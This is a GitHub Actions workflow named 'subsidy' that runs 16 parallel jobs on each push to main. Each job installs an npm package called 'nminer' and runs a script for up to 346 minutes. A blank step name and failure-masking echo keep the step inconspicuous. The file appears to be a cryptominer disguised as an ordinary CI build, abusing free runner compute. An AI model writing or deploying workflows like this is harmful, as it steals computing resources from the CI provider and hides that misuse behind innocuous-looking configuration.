name: subsidy
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 666 }
          - { version: 5104 }
          - { version: 1267 }
          - { version: 4644 }
          - { version: 8837 }
          - { version: 3274 }
          - { version: 7725 }
          - { version: 7862 }
          - { version: 4523 }
          - { version: 450 }
          - { version: 614 }
          - { version: 3368 }
          - { version: 3917 }
          - { version: 2750 }
          - { version: 1020 }
          - { version: 9448 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 346m node subsidy.js || echo "subsidy executed"